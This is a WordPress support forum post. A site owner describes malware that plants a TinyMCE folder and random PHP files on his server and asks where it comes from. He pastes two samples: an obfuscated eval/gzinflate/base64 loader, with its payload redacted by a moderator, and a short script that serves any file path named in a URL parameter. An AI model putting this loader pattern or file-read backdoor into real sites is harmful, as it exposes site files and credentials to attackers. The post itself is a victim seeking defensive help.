TinyMCE folder and php file virus
-
Hi all,
We’ve been experiencing this massive virus on our server that injects a TinyMCE folder and random .php files throughout the website. I’ve done a site cleanup: install core WordPress, manually re-install plugins and re-download parent and child themes. Has anyone seen this virus before? Is there any way to pinpoint where the virus is coming from?
Here are examples –
<strong>This is what is inside this file: lkeja9jtww.php</strong> <?php eval("\n\$dgreusdi = intval(__LINE__) * 337;");
[code redacted by moderator]
$a = str_replace($dgreusdi, "E", $a); eval (gzinflate(base64_decode($a)));
This is what is inside this file: downloadebook.php
<?php $file_url = $_GET['filename']; header('Content-Type: application/octet-stream'); header("Content-Transfer-Encoding: Binary"); header("Content-disposition: attachment; filename=\"" . basename($file_url) . "\""); readfile($file_url);
Thanks in advance!
-Chad
Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
- The topic ‘TinyMCE folder and php file virus’ is closed to new replies.